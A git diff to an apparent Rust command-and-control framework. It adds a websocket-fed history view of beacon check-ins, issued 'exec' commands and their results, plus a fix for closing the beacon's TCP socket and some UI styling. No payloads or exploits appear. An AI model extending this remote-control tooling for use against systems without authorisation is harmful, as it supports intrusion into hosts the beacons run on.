diff --git a/Cargo.lock b/Cargo.lock
index e702899..fc656b1 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1294,6 +1294,18 @@ dependencies = [
"web-sys",
]
+[[package]]
+name = "gloo-timers"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bbb143cf96099802033e0d4f4963b19fd2e0b728bcf076cd9cf7f6634f092994"
+dependencies = [
+ "futures-channel",
+ "futures-core",
+ "js-sys",
+ "wasm-bindgen",
+]
+
[[package]]
name = "gloo-utils"
version = "0.2.0"
@@ -1874,6 +1886,8 @@ dependencies = [
"chrono",
"codee 0.2.0",
"default-struct-builder",
+ "futures-util",
+ "gloo-timers",
"js-sys",
"lazy_static",
"leptos",
diff --git a/sparse-actions/src/actions.rs b/sparse-actions/src/actions.rs
index 832c107..852d2be 100644
--- a/sparse-actions/src/actions.rs
+++ b/sparse-actions/src/actions.rs
@@ -29,6 +29,34 @@ macro_rules! define_actions_enum {
$($act($mod::$act)),+,
}
+ impl Actions {
+ #[cfg(feature = "server")]
+ fn render_internal(&self, data: String) -> AnyView {
+ match self {
+ $(
+ Actions::$act(action) => {
+ let Ok(data) = serde_json::from_str(&data) else {
+ return view! {
+
"The command results in the database are corrupted"
+ }.into_any();
+ };
+ action.render_data(data).into_any()
+ },
+ )*
+ }
+ }
+
+ fn render_empty_internal(&self) -> AnyView {
+ match self {
+ $(
+ Actions::$act(action) => {
+ action.render_empty().into_any()
+ },
+ )*
+ }
+ }
+ }
+
$(
impl From<$mod::$act> for Actions {
fn from(act: $mod::$act) -> Self {
@@ -60,14 +88,31 @@ define_actions_enum! {
}
#[async_trait::async_trait]
-#[cfg(feature = "beacon")]
impl Action for Actions {
const REQ_VERSION: Version = Version::new(2, 0);
const REQ_OS: Option< &'static str> = None;
const REQ_FIELDS: &'static[(&'static str, &'static str,Option< &'static str>)] = &[];
type ActionData = String;
+ #[cfg(feature = "server-ssr")]
+ type BuilderData = Self;
+ #[cfg(feature = "server-ssr")]
+ async fn build_action(data: Self::BuilderData, _db: &sqlx::SqlitePool) -> Result {
+ Ok(data)
+ }
+
+ #[cfg(feature = "server")]
+ fn render_data(&self, data: String) -> AnyView {
+ self.render_internal(data)
+ }
+
+ #[cfg(feature = "server")]
+ fn render_empty(&self) -> AnyView {
+ self.render_empty_internal()
+ }
+
+ #[cfg(feature = "beacon")]
async fn execute<'a, T, S>(
&self,
parameters: &Parameters,
@@ -117,7 +162,10 @@ pub trait Action: Serialize + for<'a> Deserialize<'a> {
async fn build_action(data: Self::BuilderData, db: &sqlx::SqlitePool) -> Result;
#[cfg(feature = "server")]
- fn render_data(&self, data: Self::ActionData) -> impl IntoView;
+ fn render_data(&self, data: String) -> AnyView;
+
+ #[cfg(feature = "server")]
+ fn render_empty(&self) -> AnyView;
#[cfg(feature = "beacon")]
async fn execute<'a, T, S>(
diff --git a/sparse-actions/src/actions/exec.rs b/sparse-actions/src/actions/exec.rs
index 0954fa4..9c57e45 100644
--- a/sparse-actions/src/actions/exec.rs
+++ b/sparse-actions/src/actions/exec.rs
@@ -1,5 +1,5 @@
#[cfg(feature = "server")]
-use leptos::prelude::*;
+use leptos::{either::Either, prelude::*};
use serde::{Deserialize, Serialize};
#[cfg(feature = "beacon")]
@@ -45,9 +45,38 @@ impl super::Action for Exec {
}
#[cfg(feature = "server")]
- fn render_data(&self, _data: Self::ActionData) -> impl IntoView {
+ fn render_data(&self, data: String) -> AnyView {
view! {
- "execute command"
+
+ "execute command: " {self.exec_cmd.clone()}
+
+
+ {if data.len() > 0 {
+ Either::Left(view! {
+
+ "results:"
+
+
+ {data.clone()}
+
+ })
+ } else {
+ Either::Right(view! {
+ "results: (empty)"
+ })
+ }}
+
}
+ .into_any()
+ }
+
+ #[cfg(feature = "server")]
+ fn render_empty(&self) -> AnyView {
+ view! {
+
+ "execute command: " {self.exec_cmd.clone()}
+
+ }
+ .into_any()
}
}
diff --git a/sparse-beacon/src/tcp.rs b/sparse-beacon/src/tcp.rs
index a713585..6b0c2b5 100644
--- a/sparse-beacon/src/tcp.rs
+++ b/sparse-beacon/src/tcp.rs
@@ -15,7 +15,7 @@ use smoltcp::{
use tokio::{
io::{AsyncRead, AsyncWrite},
sync::broadcast,
- task::{spawn_blocking, JoinHandle},
+ task::spawn_blocking,
};
use sparse_actions::{
@@ -28,13 +28,11 @@ pub struct NetInterfaceHandle {
tcp_handle: SocketHandle,
close_background: broadcast::Sender<()>,
- background_process: JoinHandle<()>,
}
impl Drop for NetInterfaceHandle {
fn drop(&mut self) {
let _ = self.close_background.send(());
- self.background_process.abort();
}
}
@@ -295,27 +293,41 @@ where
let net = Arc::new(Mutex::new((sockets, device, iface)));
- let background_process = spawn_blocking({
+ spawn_blocking({
let net = Arc::clone(&net);
+ let tcp_handle = tcp_handle.clone();
- move || loop {
- if close_background_recv.try_recv().is_ok() {
- break;
- }
+ move || {
+ let mut close_attempts = -1;
- let delay = {
- let Ok(mut guard) = net.lock() else {
- continue;
+ loop {
+ if close_attempts == -1 && close_background_recv.try_recv().is_ok() {
+ close_attempts = 50;
+ }
+
+ if close_attempts == 0 {
+ break;
+ }
+
+ let delay = {
+ let Ok(mut guard) = net.lock() else {
+ continue;
+ };
+ let (ref mut s_guard, ref mut d_guard, ref mut i_guard) = *guard;
+
+ if close_attempts > 0 {
+ let socket = s_guard.get_mut::(tcp_handle);
+ socket.close();
+ }
+
+ let timestamp = Instant::now();
+ i_guard.poll(timestamp, d_guard, s_guard);
+
+ i_guard.poll_delay(timestamp, s_guard)
};
- let (ref mut s_guard, ref mut d_guard, ref mut i_guard) = *guard;
- let timestamp = Instant::now();
- i_guard.poll(timestamp, d_guard, s_guard);
-
- i_guard.poll_delay(timestamp, s_guard)
- };
-
- let _ = ready_wait.wait(delay.map(Into::into));
+ let _ = ready_wait.wait(delay.map(Into::into));
+ }
}
});
@@ -324,6 +336,5 @@ where
tcp_handle,
close_background,
- background_process,
})
}
diff --git a/sparse-handler/src/lib.rs b/sparse-handler/src/lib.rs
index 6647dbf..56253c3 100644
--- a/sparse-handler/src/lib.rs
+++ b/sparse-handler/src/lib.rs
@@ -17,7 +17,8 @@ pub enum BeaconEvent {
NewBeacon(String),
Checkin(String),
BeaconUpdate(String),
- BeaconCommandFinished(String, i64)
+ BeaconCommandFinished(String, i64),
+ CommandIssued(String, i64),
}
pub struct BeaconListenerHandle {
diff --git a/sparse-server/Cargo.toml b/sparse-server/Cargo.toml
index 81e7a1b..8449f98 100644
--- a/sparse-server/Cargo.toml
+++ b/sparse-server/Cargo.toml
@@ -29,7 +29,7 @@ tokio-stream = { version = "0.1", optional = true }
futures-util = { version = "0.3", optional = true }
tracing = { version = "0.1", optional = true }
web-sys = { version = "0.3", features = ["WebSocket"] }
-leptos-use = { version = "0.15", default-features = false, features = ["use_websocket", "use_interval"] }
+leptos-use = { version = "0.15", default-features = false, features = ["use_websocket", "use_interval", "use_infinite_scroll"] }
codee = { version = "0.2", features = ["json_serde"] }
sqlx = { version = "0.8", default-features = false, features = ["chrono", "macros", "migrate", "runtime-tokio", "sqlite", "sqlx-sqlite", "uuid"], optional = true }
chrono = { version = "0.4", features = ["serde"] }
diff --git a/sparse-server/src/beacons/commands.rs b/sparse-server/src/beacons/commands.rs
index 2aabfdd..23f76c1 100644
--- a/sparse-server/src/beacons/commands.rs
+++ b/sparse-server/src/beacons/commands.rs
@@ -149,6 +149,9 @@ pub async fn issue_command(
)
.execute(&db)
.await?;
+
+ let update_notifier = expect_context::>();
+ update_notifier.send(sparse_handler::BeaconEvent::CommandIssued(bid, command_id))?;
}
Target::Category(cid) => {
let version = command_builder.required_version();
@@ -168,6 +171,18 @@ pub async fn issue_command(
)
.execute(&db)
.await?;
+
+ let beacon_ids = sqlx::query!(
+ "SELECT beacon_id FROM beacon_command_invocation WHERE command_id = ?",
+ command_id
+ )
+ .fetch_all(&db)
+ .await?;
+
+ for rec in beacon_ids {
+ let update_notifier = expect_context::>();
+ update_notifier.send(sparse_handler::BeaconEvent::CommandIssued(rec.beacon_id, command_id))?;
+ }
}
}
diff --git a/sparse-server/src/beacons/instances.rs b/sparse-server/src/beacons/instances.rs
index eaecf23..6df47c6 100644
--- a/sparse-server/src/beacons/instances.rs
+++ b/sparse-server/src/beacons/instances.rs
@@ -1,21 +1,63 @@
-use leptos::{either::Either, prelude::*};
+use std::collections::VecDeque;
+use leptos::{either::{Either, EitherOf5}, prelude::*};
+#[cfg(not(feature = "ssr"))]
+use leptos_use::{use_websocket, use_infinite_scroll};
use leptos_router::params::Params;
use serde::{Serialize, Deserialize};
#[cfg(feature = "ssr")]
use {crate::db::user, leptos::server_fn::error::NoCustomError};
-use sparse_actions::version::Version;
+use sparse_actions::{actions::{Action, Actions}, version::Version};
+
+#[cfg_attr(feature = "ssr", allow(dead_code))]
+const ITEM_LOAD_AMOUNT: usize = 25;
+
+#[derive(Debug, Clone, Serialize, Deserialize, Eq, Hash, PartialEq)]
+pub enum InvokeOrResult {
+ Invoke,
+ Result
+}
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub enum LineItem {
+ CommandInvocation {
+ user_name: String,
+ invoke_date: chrono::DateTime,
+ command_id: i64,
+ action: Actions
+ },
+ CommandResult {
+ user_name: String,
+ result_date: chrono::DateTime,
+ command_id: i64,
+ action: Actions,
+ action_result: String
+ },
+ Checkin(chrono::DateTime)
+}
+
+impl LineItem {
+ fn date(&self) -> chrono::DateTime {
+ match self {
+ Self::CommandInvocation { invoke_date, .. } => invoke_date,
+ Self::CommandResult { result_date, .. } => result_date,
+ Self::Checkin(r) => r
+ }.clone()
+ }
+}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum BeaconViewEvent {
-
+ NewEvent(LineItem),
+ LoadHistorical(Vec>),
+ BeaconUpdate,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum BeaconClientMessage {
-
+ LoadHistorical(i64)
}
#[derive(Debug, Clone, Serialize, Deserialize)]
@@ -191,8 +233,85 @@ pub fn InstancesView() -> impl IntoView {
..
} = expect_context();
+ let display_checkins = RwSignal::new(true);
+
+ #[cfg_attr(feature = "ssr", allow(unused_variables))]
+ let (line_items, update_line_items) = signal(VecDeque::>::new());
+ let scroll_ref = NodeRef::::new();
+ #[cfg_attr(feature = "ssr", allow(unused_variables))]
+ let (done_with_scrolling, set_done_with_scrolling) = signal(false);
+
+ #[cfg(not(feature = "ssr"))]
+ let (web_socket, rebuild_websocket) = signal(use_websocket::<
+ BeaconClientMessage,
+ BeaconViewEvent,
+ codee::string::JsonSerdeCodec,
+ >("/api/subscribe/listener"));
+
+ #[cfg(not(feature = "ssr"))]
+ (web_socket.get_untracked().send)(&BeaconClientMessage::LoadHistorical(0));
+
+ #[cfg(not(feature = "ssr"))]
+ Effect::new(move |_| {
+ let user = expect_context::>>();
+ user.with(move |_| {
+ rebuild_websocket(use_websocket::<
+ BeaconClientMessage,
+ BeaconViewEvent,
+ codee::string::JsonSerdeCodec,
+ >(&format!(
+ "/api/subscribe/beacon/{}",
+ instance_id.get().expect("could not extract ID from URL").id)
+ ));
+ });
+ });
+
+ #[cfg(not(feature = "ssr"))]
+ Effect::new(move |_| {
+ web_socket.with(move |uwsr| {
+ uwsr.message.with(move |message| {
+ let Some(m) = message else {
+ return;
+ };
+
+ match m {
+ BeaconViewEvent::NewEvent(li) => {
+ update_line_items.update(|lis| {
+ lis.push_front(Ok(li.clone()));
+ })
+ }
+ BeaconViewEvent::LoadHistorical(historical) => {
+ if historical.len() < ITEM_LOAD_AMOUNT {
+ set_done_with_scrolling(true);
+ }
+ update_line_items.update(|lis| {
+ lis.extend(historical.into_iter().map(Clone::clone))
+ })
+ }
+ BeaconViewEvent::BeaconUpdate => {
+ instance.refetch();
+ }
+ }
+ })
+ })
+ });
+
+ #[cfg(not(feature = "ssr"))]
+ let _ = use_infinite_scroll(
+ scroll_ref,
+ move |_| async move {
+ if done_with_scrolling.get() {
+ return;
+ }
+
+ let ws = web_socket.get();
+ let line_items_len = line_items.read().len();
+ (ws.send)(&BeaconClientMessage::LoadHistorical(line_items_len as i64));
+ }
+ );
+
view! {
-
+
{move || Suspend::new(async move {
let configs = match configs.await {
@@ -249,7 +368,87 @@ pub fn InstancesView() -> impl IntoView {
/>
})
})}
+
+
+
+
+
display_checkins.get(),
+ _ => true
+ })
+ key=|lineitem| lineitem
+ .as_ref()
+ .map(move |li| li.date())
+ .map_err(Clone::clone)
+ let:lineitem
+ >
+ {match lineitem {
+ Ok(LineItem::Checkin(date)) => EitherOf5::A(view! {
+
+ "Beacon checked in at " {format!("{}", date)}
+
+ }),
+ Ok(LineItem::CommandResult {
+ result_date,
+ action,
+ action_result,
+ command_id,
+ ..
+ }) => EitherOf5::B(view! {
+
+
+
+ {action.render_data(action_result)}
+
+
+ }),
+ Ok(LineItem::CommandInvocation {
+ user_name,
+ invoke_date,
+ action,
+ command_id
+ }) => EitherOf5::C(view! {
+
+
+
+ {action.render_empty()}
+
+
+ }),
+ Err(InvokeOrResult::Result) => EitherOf5::D(view! {
+
+ "There was an issue decoding the command result in the database"
+
+ }),
+ Err(InvokeOrResult::Invoke) => EitherOf5::E(view! {
+
+ "There was an issue decoding the command sent in the database"
+
+ })
+ }}
+
+
+ {move || done_with_scrolling.get().then(|| view! {
+
+
+ "No more history entries exist for this beacon"
+
+
+ })}
+
}
}
diff --git a/sparse-server/src/beacons/sidebar.rs b/sparse-server/src/beacons/sidebar.rs
index 14a27b2..87f305e 100644
--- a/sparse-server/src/beacons/sidebar.rs
+++ b/sparse-server/src/beacons/sidebar.rs
@@ -2,7 +2,7 @@ use std::sync::Arc;
use leptos::{either::Either, prelude::*};
use leptos_router::components::A;
-#[cfg(feature = "hydrate")]
+#[cfg(not(feature = "ssr"))]
use leptos_use::use_websocket;
use serde::{Deserialize, Serialize};
@@ -599,30 +599,28 @@ pub fn BeaconSidebar() -> impl IntoView {
"Version: " {beacon.version.to_string()}
- {(sort_method.get() != Some(SortMethod::Category))
- .then(|| -> Vec
{
- let BeaconResources {
- categories,
- ..
- } = expect_context::();
+ {Some((|| {
+ let BeaconResources {
+ categories,
+ ..
+ } = expect_context::();
- let Some(Ok(ref categories)) = *categories.read() else {
- return vec![];
- };
+ let Some(Ok(ref categories)) = *categories.read() else {
+ return vec![];
+ };
- categories
- .iter()
- .filter(|cat| beacon.category_ids.contains(&cat.category_id))
- .map(|cat| cat.category_name.clone())
- .collect()
- })
+ categories
+ .iter()
+ .filter(|cat| beacon.category_ids.contains(&cat.category_id))
+ .map(|cat| cat.category_name.clone())
+ .collect::>()
+ })())
.filter(|categories| !categories.is_empty())
.map(|categories| view! {
"Categories: " {categories.join(", ")}
- })
- }
+ })}
{(sort_method.get() != Some(SortMethod::Template))
.then(|| -> Option {
let BeaconResources {
diff --git a/sparse-server/src/webserver.rs b/sparse-server/src/webserver.rs
index eaaf6e7..48f3832 100644
--- a/sparse-server/src/webserver.rs
+++ b/sparse-server/src/webserver.rs
@@ -532,6 +532,7 @@ async fn handle_listener_events(
pub async fn attach_to_beacon(
State(state): State,
cookie_jar: CookieJar,
+ Path(beacon_id): Path,
ws: ws::WebSocketUpgrade
) -> axum::response::Response {
let user = match crate::db::user::get_auth_session_inner(
@@ -551,7 +552,7 @@ pub async fn attach_to_beacon(
ws
.on_upgrade(move |socket: ws::WebSocket| async move {
- if let Err(e) = handle_beacon_socket(socket, state).await {
+ if let Err(e) = handle_beacon_socket(beacon_id, socket, state).await {
tracing::warn!("Encountered error when handling beacon subscriber: {e}");
};
})
@@ -559,12 +560,237 @@ pub async fn attach_to_beacon(
}
async fn handle_beacon_socket(
+ beacon_id: String,
mut socket: ws::WebSocket,
state: AppState,
) -> Result<(), crate::error::Error> {
- unimplemented!()
-}
+ let mut event_receiver = state.beacon_event_broadcast.subscribe();
+ use crate::beacons::instances::{BeaconClientMessage, BeaconViewEvent, InvokeOrResult, LineItem};
+
+ macro_rules! send_event {
+ ($ev:expr) => {{
+ let ev = $ev;
+ let json = serde_json::to_string(&ev)?;
+ socket.send(ws::Message::Text(json)).await?;
+ }}
+ }
+
+ loop {
+ use sparse_handler::BeaconEvent;
+
+ tokio::select! {
+ event = event_receiver.recv() => match event {
+ Ok(BeaconEvent::BeaconCommandFinished(bid, cid)) if bid == beacon_id => {
+ struct InvokeInfo {
+ params: String,
+ date: chrono::DateTime,
+ res: String,
+ user_name: String
+ }
+
+ type DateTime = chrono::DateTime;
+
+ // Null safety: the only time the above event is published is after
+ // the database has updated the two values
+ // It would maybe wise to update the event to instead pass the results...
+ let invoke_info = sqlx::query_as!(
+ InvokeInfo,
+ r#"SELECT cmd.cmd_parameters as params, bci.invocation_result as "res!",
+ bci.invocation_date as "date!: DateTime", users.user_name as user_name
+ FROM beacon_command_invocation bci
+ INNER JOIN users ON users.user_id = bci.invoker_id
+ INNER JOIN beacon_command cmd ON cmd.command_id = bci.command_id
+ WHERE bci.command_id = ? AND bci.beacon_id = ?"#,
+ cid,
+ bid
+ )
+ .fetch_one(&state.db)
+ .await?;
+
+ send_event!(BeaconViewEvent::NewEvent(LineItem::CommandResult {
+ user_name: invoke_info.user_name,
+ result_date: invoke_info.date,
+ command_id: cid,
+ action: serde_json::from_str(&invoke_info.params)?,
+ action_result: invoke_info.res
+ }));
+ }
+ Ok(BeaconEvent::BeaconUpdate(bid)) if bid == beacon_id => {
+ send_event!(BeaconViewEvent::BeaconUpdate);
+ }
+ Ok(BeaconEvent::Checkin(bid)) if bid == beacon_id => {
+ send_event!(BeaconViewEvent::NewEvent(LineItem::Checkin(chrono::Utc::now())));
+ }
+ Ok(BeaconEvent::CommandIssued(bid, cid)) if bid == beacon_id => {
+ struct InvokeInfo {
+ params: String,
+ date: chrono::DateTime,
+ user_name: String
+ }
+
+ type DateTime = chrono::DateTime;
+
+ // Null safety: the only time the above event is published is after
+ // the database has updated the two values
+ // It would maybe wise to update the event to instead pass the results...
+ let invoke_info = sqlx::query_as!(
+ InvokeInfo,
+ r#"SELECT cmd.cmd_parameters as params, bci.issue_date as "date: DateTime",
+ users.user_name as user_name
+ FROM beacon_command_invocation bci
+ INNER JOIN users ON users.user_id = bci.invoker_id
+ INNER JOIN beacon_command cmd ON cmd.command_id = bci.command_id
+ WHERE bci.command_id = ? AND bci.beacon_id = ?"#,
+ cid,
+ bid
+ )
+ .fetch_one(&state.db)
+ .await?;
+
+ send_event!(BeaconViewEvent::NewEvent(LineItem::CommandInvocation {
+ user_name: invoke_info.user_name,
+ invoke_date: invoke_info.date,
+ command_id: cid,
+ action: serde_json::from_str(&invoke_info.params)?,
+ }));
+ }
+ Ok(_) => {
+ // not for us
+ }
+ Err(e) => {
+ tracing::warn!("Unable to handle general event: {e:?}");
+ }
+ },
+ user_event = socket.recv() => match user_event {
+ Some(Ok(ws::Message::Text(ev))) => {
+ let Ok(msg) = serde_json::from_str::(&ev) else {
+ continue;
+ };
+
+ let BeaconClientMessage::LoadHistorical(offset) = msg;
+
+ #[derive(Debug)]
+ enum DbLineItem {
+ CommandInvocation {
+ user_name: String,
+ invoke_date: chrono::DateTime,
+ command_id: i64,
+ action: String
+ },
+ CommandResult {
+ user_name: String,
+ result_date: chrono::DateTime,
+ command_id: i64,
+ action: String,
+ action_result: String
+ },
+ Checkin(chrono::DateTime)
+ }
+
+ use sqlx::{FromRow, sqlite::SqliteRow, Row};
+ impl FromRow<'_, SqliteRow> for DbLineItem {
+ fn from_row(row: &SqliteRow) -> sqlx::Result {
+ match row.try_get("item")? {
+ "checkin" => Ok(Self::Checkin(
+ row.try_get("item_date")?
+ )),
+ "invoke" => Ok(Self::CommandInvocation {
+ invoke_date: row.try_get("item_date")?,
+ user_name: row.try_get(2)?,
+ command_id: row.try_get(3)?,
+ action: row.try_get(4)?
+ }),
+ "result" => Ok(Self::CommandResult {
+ result_date: row.try_get("item_date")?,
+ user_name: row.try_get(5)?,
+ command_id: row.try_get(6)?,
+ action: row.try_get(7)?,
+ action_result: row.try_get(8)?
+ }),
+ type_name => Err(sqlx::Error::TypeNotFound {
+ type_name: type_name.to_string(),
+ }),
+ }
+ }
+ }
+
+ let info: Vec = sqlx::query_as(
+ r#"SELECT 'checkin' as item, checkin_date as item_date,
+ NULL, NULL, NULL,
+ NULL, NULL, NULL, NULL
+ FROM beacon_checkin WHERE beacon_id = ?
+ UNION
+ SELECT 'invoke' as item, bci.issue_date as item_date,
+ users.user_name, bci.command_id, cmd.cmd_parameters,
+ NULL, NULL, NULL, NULL
+ FROM beacon_command_invocation bci
+ INNER JOIN users ON users.user_id = bci.invoker_id
+ INNER JOIN beacon_command cmd ON cmd.command_id = bci.command_id
+ WHERE bci.beacon_id = ?
+ UNION
+ SELECT 'result' as item, bci.invocation_date as item_date,
+ NULL, NULL, NULL,
+ users.user_name, bci.command_id, cmd.cmd_parameters, bci.invocation_result
+ FROM beacon_command_invocation bci
+ INNER JOIN users ON users.user_id = bci.invoker_id
+ INNER JOIN beacon_command cmd ON cmd.command_id = bci.command_id
+ WHERE bci.beacon_id = ? AND bci.invocation_result IS NOT NULL
+ ORDER BY item_date DESC
+ LIMIT ?, 25"#,
+ )
+ .bind(&beacon_id)
+ .bind(&beacon_id)
+ .bind(&beacon_id)
+ .bind(offset)
+ .fetch_all(&state.db)
+ .await?;
+
+ let info = info
+ .into_iter()
+ .map(|r| match r {
+ DbLineItem::CommandInvocation {
+ user_name,
+ invoke_date,
+ command_id,
+ action
+ } => serde_json::from_str(&action)
+ .map_err(|_| InvokeOrResult::Invoke)
+ .map(|action| LineItem::CommandInvocation {
+ user_name,
+ invoke_date,
+ command_id,
+ action
+ }),
+ DbLineItem::CommandResult {
+ user_name,
+ result_date,
+ command_id,
+ action,
+ action_result
+ } => serde_json::from_str(&action)
+ .map_err(|_| InvokeOrResult::Result)
+ .map(|action| LineItem::CommandResult {
+ user_name,
+ result_date,
+ command_id,
+ action,
+ action_result
+ }),
+ DbLineItem::Checkin(d) => Ok(LineItem::Checkin(d)),
+ })
+ .collect();
+
+ send_event!(BeaconViewEvent::LoadHistorical(info));
+ }
+ Some(Ok(ws::Message::Close(_))) => {
+ break Ok(());
+ }
+ _ => {}
+ }
+ }
+ }
+}
pub async fn serve_web(
management_address: SocketAddrV4,
@@ -608,6 +834,10 @@ pub async fn serve_web(
"/api/subscribe/listener",
axum::routing::any(subscribe_to_listener_events)
)
+ .route(
+ "/api/subscribe/beacon/:beacon_id",
+ axum::routing::any(attach_to_beacon)
+ )
.route("/api/*fn_name", post(leptos_axum::handle_server_fns))
.leptos_routes_with_context(
&state,
diff --git a/sparse-server/style/beacons/_instances.scss b/sparse-server/style/beacons/_instances.scss
index de7ee8b..9925122 100644
--- a/sparse-server/style/beacons/_instances.scss
+++ b/sparse-server/style/beacons/_instances.scss
@@ -12,4 +12,59 @@ div.instance {
margin: 10px;
}
}
+
+ .instance-hist-beacon, .instance-hist-user {
+ margin: 15px 0px 0px 0px;
+ display: inline-block;
+ clear: both;
+ }
+
+ .instance-hist-bodiless {
+ padding: 15px;
+ }
+
+ .instance-hist-header {
+ padding: 15px;
+ margin: 0;
+ border-bottom: 1px solid;
+ }
+
+ .instance-hist-body {
+ padding: 15px;
+ margin: 0;
+ }
+
+ .instance-hist-beacon {
+ background-color: #11111c;
+ border: 1px solid #2e2e59;
+ float: left;
+
+ .instance-hist-header {
+ border-bottom-color: #2e2e59;
+ }
+ }
+
+ .instance-hist-user {
+ background-color: #2e2e59;
+ border: 1px solid #5e5ea0;
+ float: right;
+
+ .instance-hist-header {
+ border-bottom-color: #5e5e59;
+ }
+ }
+
+ .instance-hist-end {
+ padding: 15px;
+ clear: both;
+ margin: 15px;
+ display: flex;
+ justify-content: center;
+ width: 100%;
+ }
+
+ .instance-hist-end-inner {
+ font-style: italic;
+ display: inline-block;
+ }
}